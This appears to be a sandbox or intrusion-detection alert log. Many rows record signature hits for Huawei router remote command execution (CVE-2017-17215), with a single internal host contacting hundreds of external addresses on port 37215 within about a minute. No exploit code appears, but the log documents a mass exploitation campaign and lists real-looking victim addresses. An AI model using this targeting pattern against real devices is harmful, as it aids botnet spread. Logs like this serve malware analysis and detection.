                                                        06/13/24-21:32:56.784431TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4270637215192.168.2.14197.172.131.143
                                                        06/13/24-21:32:46.523844TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3451237215192.168.2.14197.47.177.164
                                                        06/13/24-21:32:42.417726TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4668237215192.168.2.14197.62.242.116
                                                        06/13/24-21:33:15.275934TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5988837215192.168.2.1441.119.146.166
                                                        06/13/24-21:32:42.403322TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5991237215192.168.2.14156.236.113.153
                                                        06/13/24-21:33:09.112312TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3771637215192.168.2.14156.71.119.55
                                                        06/13/24-21:32:15.610482TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4340037215192.168.2.14156.234.86.56
                                                        06/13/24-21:33:02.909065TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5725237215192.168.2.14156.159.205.21
                                                        06/13/24-21:32:07.417237TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4931437215192.168.2.1441.45.78.43
                                                        06/13/24-21:32:01.239770TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5711437215192.168.2.1441.7.165.176
                                                        06/13/24-21:31:57.092388TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4863437215192.168.2.1441.167.190.75
                                                        06/13/24-21:32:56.784732TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4886437215192.168.2.14197.98.150.81
                                                        06/13/24-21:33:13.210726TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6011437215192.168.2.14156.27.41.157
                                                        06/13/24-21:32:36.264258TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5355437215192.168.2.14197.91.145.135
                                                        06/13/24-21:32:38.300164TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4574837215192.168.2.1441.23.158.209
                                                        06/13/24-21:33:09.112513TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5703237215192.168.2.14156.47.117.29
                                                        06/13/24-21:31:59.196703TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3764437215192.168.2.1441.98.48.97
                                                        06/13/24-21:32:07.400652TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5142237215192.168.2.14197.57.212.94
                                                        06/13/24-21:32:52.670616TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5227637215192.168.2.14197.45.210.254
                                                        06/13/24-21:33:05.014555TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3596637215192.168.2.14156.219.133.42
                                                        06/13/24-21:32:30.075445TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3888837215192.168.2.1441.33.155.6
                                                        06/13/24-21:32:23.943014TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4492637215192.168.2.14197.107.28.243
                                                        06/13/24-21:32:23.942318TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3768837215192.168.2.14156.36.57.61
                                                        06/13/24-21:32:19.729510TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3752037215192.168.2.14156.188.27.219
                                                        06/13/24-21:32:23.931955TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3874837215192.168.2.1441.4.153.245
                                                        06/13/24-21:31:57.135732TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5344237215192.168.2.14197.214.162.178
                                                        06/13/24-21:32:32.155169TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4105037215192.168.2.1441.18.12.130
                                                        06/13/24-21:32:46.502509TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5882837215192.168.2.1441.225.9.175
                                                        06/13/24-21:31:59.174412TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5206037215192.168.2.1441.22.200.117
                                                        06/13/24-21:32:56.757465TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4735037215192.168.2.14156.164.43.145
                                                        06/13/24-21:32:54.727230TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4226037215192.168.2.14156.110.191.147
                                                        06/13/24-21:32:34.216314TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4762437215192.168.2.14156.90.103.223
                                                        06/13/24-21:32:32.155609TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3740037215192.168.2.1441.1.182.147
                                                        06/13/24-21:32:32.170094TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3437237215192.168.2.1441.238.164.55
                                                        06/13/24-21:32:56.759059TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4613637215192.168.2.14156.171.161.214
                                                        06/13/24-21:32:21.803432TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4935637215192.168.2.14197.51.190.7
                                                        06/13/24-21:33:07.042191TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6082437215192.168.2.1441.253.64.10
                                                        06/13/24-21:33:13.232136TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4172837215192.168.2.1441.126.177.56
                                                        06/13/24-21:32:03.279772TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5998237215192.168.2.14197.40.126.172
                                                        06/13/24-21:32:34.194574TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5413037215192.168.2.14197.252.55.166
                                                        06/13/24-21:32:36.246528TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4575037215192.168.2.1441.202.132.195
                                                        06/13/24-21:32:23.836250TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5323437215192.168.2.1441.253.47.37
                                                        06/13/24-21:32:38.319916TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5961637215192.168.2.14197.55.170.166
                                                        06/13/24-21:32:03.278892TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3600837215192.168.2.14197.39.167.206
                                                        06/13/24-21:32:07.403028TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5683237215192.168.2.14197.107.203.153
                                                        06/13/24-21:32:30.077335TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3294437215192.168.2.14197.233.123.47
                                                        06/13/24-21:33:02.936507TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5476437215192.168.2.1441.51.197.144
                                                        06/13/24-21:32:07.401355TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5617437215192.168.2.1441.98.114.69
                                                        06/13/24-21:32:42.408428TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5688837215192.168.2.1441.86.65.221
                                                        06/13/24-21:32:48.555987TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4900837215192.168.2.14156.171.15.20
                                                        06/13/24-21:32:30.076626TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3902837215192.168.2.14156.229.104.23
                                                        06/13/24-21:32:40.356001TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3975437215192.168.2.1441.26.209.182
                                                        06/13/24-21:32:25.996307TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4694237215192.168.2.14156.70.3.38
                                                        06/13/24-21:32:52.655462TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5966437215192.168.2.14156.180.129.111
                                                        06/13/24-21:33:07.054972TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3294037215192.168.2.14197.116.60.5
                                                        06/13/24-21:32:38.322047TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3600637215192.168.2.14156.40.201.205
                                                        06/13/24-21:33:07.060894TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4876437215192.168.2.14156.126.89.245
                                                        06/13/24-21:32:50.609703TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5015237215192.168.2.1441.253.215.42
                                                        06/13/24-21:31:57.129553TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5702237215192.168.2.14197.120.240.105
                                                        06/13/24-21:32:36.264994TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5105037215192.168.2.14197.191.54.202
                                                        06/13/24-21:33:00.871060TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5091637215192.168.2.14197.246.55.16
                                                        06/13/24-21:32:23.831615TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4239037215192.168.2.14197.85.70.100
                                                        06/13/24-21:32:40.356655TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3896637215192.168.2.14197.137.255.197
                                                        06/13/24-21:32:52.677156TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4183637215192.168.2.14156.82.1.215
                                                        06/13/24-21:32:17.678387TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3670437215192.168.2.14197.72.1.69
                                                        06/13/24-21:32:58.838858TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3292837215192.168.2.1441.86.117.186
                                                        06/13/24-21:32:54.726968TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5643837215192.168.2.1441.111.23.165
                                                        06/13/24-21:31:59.195645TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5386037215192.168.2.1441.38.41.192
                                                        06/13/24-21:33:02.937863TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4715637215192.168.2.14197.232.59.192
                                                        06/13/24-21:33:02.949848TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4446637215192.168.2.1441.8.126.193
                                                        06/13/24-21:32:03.297133TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3486037215192.168.2.1441.96.239.161
                                                        06/13/24-21:32:01.246902TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5709237215192.168.2.14156.154.180.13
                                                        06/13/24-21:33:13.231246TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3536437215192.168.2.1441.235.79.102
                                                        06/13/24-21:32:19.729418TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4384237215192.168.2.1441.92.218.207
                                                        06/13/24-21:33:02.908717TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5353437215192.168.2.1441.115.226.160
                                                        06/13/24-21:32:03.279099TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5462437215192.168.2.14156.22.15.149
                                                        06/13/24-21:32:38.302186TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5788437215192.168.2.14197.109.196.128
                                                        06/13/24-21:33:00.868587TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3788037215192.168.2.14197.242.85.218
                                                        06/13/24-21:32:46.501734TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4233437215192.168.2.14156.227.189.99
                                                        06/13/24-21:33:13.227514TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3807237215192.168.2.1441.56.42.167
                                                        06/13/24-21:32:56.789390TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3664637215192.168.2.14197.153.214.197
                                                        06/13/24-21:33:09.108814TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5438037215192.168.2.14197.129.157.43
                                                        06/13/24-21:32:07.402624TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5242237215192.168.2.14197.13.39.169
                                                        06/13/24-21:32:01.238034TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3718037215192.168.2.14197.28.31.212
                                                        06/13/24-21:32:40.357222TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3446837215192.168.2.1441.15.22.97
                                                        06/13/24-21:32:28.028572TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5356637215192.168.2.14156.222.128.233
                                                        06/13/24-21:32:40.358509TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3577237215192.168.2.14156.232.208.214
                                                        06/13/24-21:33:17.307637TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4236037215192.168.2.14156.45.58.61
                                                        06/13/24-21:32:07.404601TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5962837215192.168.2.14197.34.21.202
                                                        06/13/24-21:32:17.672148TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4803037215192.168.2.14156.154.51.252
                                                        06/13/24-21:32:50.617374TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4186237215192.168.2.1441.173.255.241
                                                        06/13/24-21:33:02.910373TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4806237215192.168.2.1441.162.1.74
                                                        06/13/24-21:32:13.545985TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5876837215192.168.2.14197.122.237.157
                                                        06/13/24-21:32:11.486558TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5164237215192.168.2.14156.34.47.183
                                                        06/13/24-21:33:07.041008TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5268837215192.168.2.1441.4.16.73
                                                        06/13/24-21:32:09.440403TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3706237215192.168.2.14197.3.248.190
                                                        06/13/24-21:32:05.346833TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5802037215192.168.2.1441.115.180.24
                                                        06/13/24-21:32:17.697263TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3586837215192.168.2.14156.136.252.148
                                                        06/13/24-21:32:46.524502TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4025037215192.168.2.14197.103.93.107
                                                        06/13/24-21:33:02.953920TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4590237215192.168.2.14156.222.200.220
                                                        06/13/24-21:32:09.438330TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4033037215192.168.2.14197.129.120.22
                                                        06/13/24-21:32:34.192573TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5194837215192.168.2.14197.68.215.223
                                                        06/13/24-21:32:23.833215TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3355437215192.168.2.1441.254.188.218
                                                        06/13/24-21:32:38.301921TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3593437215192.168.2.1441.7.77.143
                                                        06/13/24-21:32:30.078503TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4933637215192.168.2.14156.58.158.137
                                                        06/13/24-21:32:36.267241TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5175237215192.168.2.1441.2.219.83
                                                        06/13/24-21:32:25.973376TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5935837215192.168.2.14197.69.121.252
                                                        06/13/24-21:32:15.610681TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4722037215192.168.2.14156.13.57.104
                                                        06/13/24-21:32:11.487323TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5907637215192.168.2.1441.142.252.62
                                                        06/13/24-21:32:23.835282TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6025437215192.168.2.1441.28.109.23
                                                        06/13/24-21:32:11.485787TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4147437215192.168.2.14156.219.14.156
                                                        06/13/24-21:32:36.268871TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4868837215192.168.2.14156.110.130.102
                                                        06/13/24-21:32:34.194748TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3520437215192.168.2.14197.59.44.126
                                                        06/13/24-21:33:15.276017TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5602237215192.168.2.1441.88.68.94
                                                        06/13/24-21:31:57.093639TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6045637215192.168.2.1441.154.117.158
                                                        06/13/24-21:31:57.131976TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3607637215192.168.2.14197.232.125.213
                                                        06/13/24-21:32:25.974925TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4076037215192.168.2.14156.132.127.248
                                                        06/13/24-21:32:34.214119TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3677237215192.168.2.14197.222.198.15
                                                        06/13/24-21:32:40.379902TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3312037215192.168.2.14156.75.33.23
                                                        06/13/24-21:32:15.633892TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3499837215192.168.2.14197.123.42.130
                                                        06/13/24-21:33:07.040936TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4032237215192.168.2.1441.240.127.247
                                                        06/13/24-21:31:59.174375TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5370237215192.168.2.14197.39.96.114
                                                        06/13/24-21:33:13.226899TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4251037215192.168.2.14197.41.3.231
                                                        06/13/24-21:32:36.267764TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5923437215192.168.2.1441.248.179.28
                                                        06/13/24-21:32:48.552896TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5332237215192.168.2.14197.171.148.151
                                                        06/13/24-21:32:42.422189TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4309037215192.168.2.1441.238.144.223
                                                        06/13/24-21:32:19.727929TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3837837215192.168.2.14156.221.184.233
                                                        06/13/24-21:31:57.131778TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5230637215192.168.2.14197.87.109.131
                                                        06/13/24-21:32:11.487381TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3620037215192.168.2.14197.203.246.176
                                                        06/13/24-21:32:58.839595TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4272437215192.168.2.14197.29.120.22
                                                        06/13/24-21:32:09.456079TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5302037215192.168.2.14197.110.66.93
                                                        06/13/24-21:32:36.244950TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5886437215192.168.2.14156.184.221.25
                                                        06/13/24-21:32:13.566731TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3315837215192.168.2.14197.103.253.74
                                                        06/13/24-21:32:54.707355TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3498237215192.168.2.1441.251.94.208
                                                        06/13/24-21:33:17.308582TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3707437215192.168.2.1441.35.132.169
                                                        06/13/24-21:32:07.404070TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5046637215192.168.2.1441.75.88.207
                                                        06/13/24-21:32:32.154606TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5805437215192.168.2.14156.244.213.53
                                                        06/13/24-21:32:44.477174TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4087437215192.168.2.1441.166.57.153
                                                        06/13/24-21:32:30.074239TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4176237215192.168.2.14156.83.251.92
                                                        06/13/24-21:32:05.347284TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4230437215192.168.2.14197.242.173.51
                                                        06/13/24-21:32:03.299320TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5559637215192.168.2.14197.175.74.47
                                                        06/13/24-21:32:44.454694TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5949837215192.168.2.14197.66.58.131
                                                        06/13/24-21:32:25.994208TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4361837215192.168.2.14156.115.158.227
                                                        06/13/24-21:32:03.276190TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3940637215192.168.2.14197.17.79.167
                                                        06/13/24-21:32:46.508350TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3655237215192.168.2.14156.169.153.140
                                                        06/13/24-21:33:05.012689TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4768837215192.168.2.14156.5.55.193
                                                        06/13/24-21:32:21.800293TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5085637215192.168.2.14156.72.124.52
                                                        06/13/24-21:31:57.094065TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5705637215192.168.2.14197.213.201.186
                                                        06/13/24-21:32:48.552719TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3279037215192.168.2.1441.135.185.71
                                                        06/13/24-21:33:17.308625TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4758437215192.168.2.1441.93.121.217
                                                        06/13/24-21:32:11.506040TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3852837215192.168.2.1441.5.218.140
                                                        06/13/24-21:32:19.752073TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3513037215192.168.2.1441.222.134.253
                                                        06/13/24-21:32:15.635232TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5287637215192.168.2.1441.27.109.85
                                                        06/13/24-21:32:32.153353TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4077437215192.168.2.14156.203.221.225
                                                        06/13/24-21:32:46.528153TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4689837215192.168.2.14156.112.139.21
                                                        06/13/24-21:32:30.078150TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3921437215192.168.2.14156.164.241.108
                                                        06/13/24-21:32:56.757354TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5201637215192.168.2.14156.116.85.57
                                                        06/13/24-21:32:36.243637TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4228437215192.168.2.14156.96.6.46
                                                        06/13/24-21:33:02.936703TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4440637215192.168.2.1441.149.40.12
                                                        06/13/24-21:33:07.037964TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5882437215192.168.2.14197.120.130.109
                                                        06/13/24-21:33:09.129716TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3482837215192.168.2.1441.224.14.34
                                                        06/13/24-21:32:40.377509TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4357637215192.168.2.1441.188.52.63
                                                        06/13/24-21:32:50.631440TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5854437215192.168.2.14197.82.92.227
                                                        06/13/24-21:32:52.669156TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4010237215192.168.2.14156.142.134.92
                                                        06/13/24-21:32:40.376677TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5594637215192.168.2.14156.152.147.207
                                                        06/13/24-21:32:17.670711TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5411437215192.168.2.14197.59.172.159
                                                        06/13/24-21:32:25.991948TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3493837215192.168.2.14156.197.234.48
                                                        06/13/24-21:32:42.406980TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3520837215192.168.2.14156.23.238.110
                                                        06/13/24-21:32:34.198903TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6033437215192.168.2.14156.191.164.163
                                                        06/13/24-21:32:09.457077TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4118437215192.168.2.14197.92.38.6
                                                        06/13/24-21:32:44.453554TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3566837215192.168.2.14197.249.60.151
                                                        06/13/24-21:32:38.301877TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5931237215192.168.2.14156.3.123.157
                                                        06/13/24-21:32:36.266025TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4120237215192.168.2.1441.54.86.247
                                                        06/13/24-21:33:11.177191TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5552437215192.168.2.14197.205.55.111
                                                        06/13/24-21:33:02.908240TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5924837215192.168.2.1441.120.219.229
                                                        06/13/24-21:32:38.317599TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5923237215192.168.2.14197.199.15.123
                                                        06/13/24-21:32:54.709485TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3327237215192.168.2.14197.29.91.16
                                                        06/13/24-21:32:28.025207TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4001437215192.168.2.1441.103.117.249
                                                        06/13/24-21:31:59.196832TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5679837215192.168.2.14156.192.228.40
                                                        06/13/24-21:32:32.165367TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3959837215192.168.2.1441.54.115.143
                                                        06/13/24-21:32:05.370885TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3825437215192.168.2.14156.249.148.164
                                                        06/13/24-21:32:38.304174TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3407237215192.168.2.1441.126.205.211
                                                        06/13/24-21:33:07.055420TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4041237215192.168.2.14197.187.157.100
                                                        06/13/24-21:33:13.213849TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5571237215192.168.2.14156.127.55.204
                                                        06/13/24-21:32:17.693953TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5030837215192.168.2.14197.47.148.70
                                                        06/13/24-21:33:00.870030TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4131037215192.168.2.14197.124.76.104
